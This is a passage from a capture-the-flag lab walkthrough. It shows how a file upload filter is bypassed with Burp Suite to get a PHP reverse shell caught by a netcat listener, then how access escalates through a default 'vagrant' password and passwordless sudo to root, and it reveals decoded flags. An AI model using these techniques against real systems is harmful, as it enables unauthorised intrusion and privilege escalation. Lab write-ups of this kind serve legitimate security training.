This filter helps bypass the restriction of image file uploads, as the target server only accepts image files.

For more detailed guidance, consider watching a video tutorial on exploiting File Upload vulnerabilities. This will provide a clearer understanding of the process.

When uploading the shell.png file, we need to manipulate it to establish a shell connection. Utilizing Burp Suite, we can intercept the request (post comment) in Burp Suite.

Burp Suite: Web Crawler, Scanner, Proxy

Explore the functionalities of Burp Suite, a leading tool for web application security testing. This guide covers its web crawler, scanner, and proxy features, providing insights into how to effectively use Burp Suite for vulnerability assessment and penetration testing.

However, before that, we need to start a listener using Netcat.

┌──(kali㉿kali)-[~]

└─$ nc -lvnp 1234

listening on [any] 1234 ...

Intercept the request (post comment) in Burp Suite

Now, Let's start by launching Burp Suite. 

Access the proxy tab and activate intercept mode to capture target requests. 

Configure your browser's proxy settings using FoxyProxy . Switch the proxy to Burp Suite within the FoxyProxy extension .

Upon uploading the file, Burp Suite automatically intercepts the uploaded data. Let's modify the ".png" extension to ".php" and click "Forward" to execute the reverse shell file upon upload. 

By forwarding the altered intercepted data in Burp Suite, we successfully established a shell connection.

┌──(kali㉿kali)-[~]

└─$ nc -lvnp 1234

listening on [any] 1234 ...

connect to [192.168.95.3] from (UNKNOWN) [192.168.95.10] 44474

Linux ubuntu-xenial 4.4.0-206-generic #238-Ubuntu SMP Tue Mar 16 07:52:37 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

 18:21:32 up  1:20,  0 users,  load average: 0.03, 0.01, 0.00

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can't access tty; job control turned off

$

Next, let's check the user's identity on the target system. 

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$

Upon investigation, I discovered that the user identity is www-data, and the group is also the same. However, this is not the desired outcome. 

To spawn a shell, I need to determine which version of Python is running. 

$ which python

$ which python3

/usr/bin/python3

$

It turns out that Python3 is in use. I'll execute the command, to spawn the shell. Additionally, I'll change the export terminal to Xterm. 

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@ubuntu-xenial:/$ export TERM=xterm

export TERM=xterm

www-data@ubuntu-xenial:/$

Now, let's locate the user flag, typically found in the user directory. In every Linux system, there is a home directory containing user directories.

www-data@ubuntu-xenial:/$ cd /home

cd /home

www-data@ubuntu-xenial:/home$ ls

ls

james  ubuntu  vagrant

www-data@ubuntu-xenial:/home$

Upon inspection, three directories are present: james, Ubuntu, and vagrant. I suspect the user flag may be located in the "james" directory.

www-data@ubuntu-xenial:/home$ cd james  

cd james

www-data@ubuntu-xenial:/home/james$ ls -al

ls -al

total 24

drwxr-xr-x 2 james james 4096 Jan 17  2021 .

drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..

-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout

-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc

-rw-r--r-- 1 james james  655 Jan 17  2021 .profile

-rw------- 1 james james   29 Apr  2  2021 user.txt

www-data@ubuntu-xenial:/home/james$

Let's attempt to open it using the "cat" command. 

www-data@ubuntu-xenial:/home/james$ cat user.txt

cat user.txt

cat: user.txt: Permission denied

www-data@ubuntu-xenial:/home/james$

However, upon accessing it, we encounter a " permission denied " error. Fortunately, there is another user that may assist in opening the user flag. 

www-data@ubuntu-xenial:/home/james$ cd ..

cd ..

www-data@ubuntu-xenial:/home$ ls -al

ls -al

total 20

drwxr-xr-x  5 root    root    4096 Jan 17  2021 .

drwxr-xr-x 25 root    root    4096 May  9 17:00 ..

drwxr-xr-x  2 james   james   4096 Jan 17  2021 james

drwxr-xr-x  3 ubuntu  ubuntu  4096 Jan 17  2021 ubuntu

drwxr-xr-x  4 vagrant vagrant 4096 Jan 17  2021 vagrant

www-data@ubuntu-xenial:/home$ 

Let's switch to the " vagrant " username.

www-data@ubuntu-xenial:/home$ su vagrant

su vagrant

Password:

Upon switching the user, it prompts us to input a password. Upon researching, we find that 

" Vagrant is a tool for creating and managing virtual development environments." Typically, the default username and password for a Vagrant virtual machine are "vagrant."  

Let's input the default password and see if it grants us access.

www-data@ubuntu-xenial:/home$ su vagrant

su vagrant

Password: vagrant  

vagrant@ubuntu-xenial:/home$ whoami 

whoami

vagrant

vagrant@ubuntu-xenial:/home$

Success! With the default password, we can now potentially access the user flag using the "cat" command. 

vagrant@ubuntu-xenial:/home$  cat /james/user.txt

cat /james/user.txt

cat: user.txt: Permission denied

However, I suspect that the " vagrant " user does not have permission to access the user.txt file. 

Let's verify the user's privileges to obtain the user flag. Additionally, let's escalate privileges to obtain the root flag and complete the task.

 

Privilege Escalation

During the privilege escalation process, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could grant us higher privileges, ultimately allowing access to the root level.

To begin, let's conduct a User Permissions Enumeration to assess the user's rights and privileges on the system. This can be accomplished by executing commands such as " sudo -l " or " uname -a " to determine which commands the current user can run with elevated privileges.

vagrant@ubuntu-xenial:/home$ sudo -l

sudo -l

Matching Defaults entries for vagrant on ubuntu-xenial:

    env_reset, mail_badpass,

    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:

    (ALL) NOPASSWD: ALL

vagrant@ubuntu-xenial:/home$

After running the " sudo -l " command, I discovered that the user " vagrant " has all permissions, indicating that no password is required to use the sudo command.

Sudo Privilege Escalation

Now, let's run the " sudo su " command to confirm our assumption. 

vagrant@ubuntu-xenial:/home$ sudo su

sudo su

root @ubuntu-xenial:/home#

And voila! We are now root! Now, let's rerun the previous command to view the user flag. 

root@ubuntu-xenial:/home# cat james/user.txt

cat james/user.txt

ZmxhZ3tZMHVfRCFEXzE3IDopfQ==

root@ubuntu-xenial:/home#

Finally, we now have the user flag. 

Now, it's time to shift our focus to obtaining the root flag. Navigate to the root directory, and you'll find the root flag. 

root@ubuntu-xenial:/home# cd /root

cd /root

root@ubuntu-xenial:~# ls -al

ls -al

total 24

drwx------  3 root root 4096 Jan 17  2021 .

drwxr-xr-x 25 root root 4096 May  9 17:00 ..

-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc

-rw-r--r--  1 root root  148 Aug 17  2015 .profile

-rw-r--r--  1 root root  501 Apr  2  2021 root.txt

drwx------  2 root root 4096 Jan 17  2021 .ssh

root@ubuntu-xenial:~#

Here it is!

root@ubuntu-xenial:~# cat root.txt

cat root.txt

SGV5IFRoZXJlLApNeXNlbGYgR2F1cmF2IFJhaiwgSGFja2VyLCBQcm9ncmFtbWVyICYgRnJlZUxhbmNlci4KVGhpcyBpcyBteSBmaXJzdCBhdHRlbXB0IHRvIGNyZWF0ZSBhIHJvb20uIExldCBtZSBrbm93IGlmIHlvdSBsaWtlZCBpdC4KQW55IGlzc3VlIG9yIHN1Z2dlc3Rpb25zIGZvciBtZS4gUGluZyBtZSBhdCB0d2l0dGVyCgpUd2l0dGVyOiBAdGhlaGFja2Vyc2JyYWluCkdpdGh1YjogQHRoZWhhY2tlcnNicmFpbgpJbnN0YWdyYW06IEB0aGVoYWNrZXJzYnJhaW4KQmxvZzogaHR0cHM6Ly90aGVoYWNrZXJzYnJhaW4ucHl0aG9uYW55d2hlcmUuY29tCgoKSGVyZSdzIFlvdXIgRmxhZy4KZmxhZ3tXMzExX0QwbjNfWTB1X1AzbjN0cjR0M2RfTTMgOil9Cg==

root@ubuntu-xenial:~# 

I suspect both the user flag and root flag are encoded in base64 format. Let's decode them to reveal their contents.

┌──(kali㉿kali)-[~]

└─$ echo "ZmxhZ3tZMHVfRCFEXzE3IDopfQ==" | base64 -d

flag{Y0u_D!D_17 :)}                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ echo "SGV5IFRoZXJlLApNeXNlbGYgR2F1cmF2IFJhaiwgSGFja2VyLCBQcm9ncmFtbWVyICYgRnJlZUxhbmNlci4KVGhpcyBpcyBteSBmaXJzdCBhdHRlbXB0IHRvIGNyZWF0ZSBhIHJvb20uIExldCBtZSBrbm93IGlmIHlvdSBsaWtlZCBpdC4KQW55IGlzc3VlIG9yIHN1Z2dlc3Rpb25zIGZvciBtZS4gUGluZyBtZSBhdCB0d2l0dGVyCgpUd2l0dGVyOiBAdGhlaGFja2Vyc2JyYWluCkdpdGh1YjogQHRoZWhhY2tlcnNicmFpbgpJbnN0YWdyYW06IEB0aGVoYWNrZXJzYnJhaW4KQmxvZzogaHR0cHM6Ly90aGVoYWNrZXJzYnJhaW4ucHl0aG9uYW55d2hlcmUuY29tCgoKSGVyZSdzIFlvdXIgRmxhZy4KZmxhZ3tXMzExX0QwbjNfWTB1X1AzbjN0cjR0M2RfTTMgOil9Cg==" | base64 -d

Hey There,

Myself Gaurav Raj, Hacker, Programmer & FreeLancer.

This is my first attempt to create a room. Let me know if you liked it.

Any issue or suggestions for me. Ping me at twitter

Twitter: @thehackersbrain

Github: @thehackersbrain

Instagram: @thehackersbrain

Blog: https://thehackersbrain.pythonanywhere.com

Here's Your Flag.

flag{W311_D0n3_Y0u_P3n3tr4t3d_M3 :)}

                                                                                                                               

┌──(kali㉿kali)-[~]

└─$ 

If you have any questions or concerns, don't hesitate to leave a comment below. I'm here to assist and address any inquiries you may have.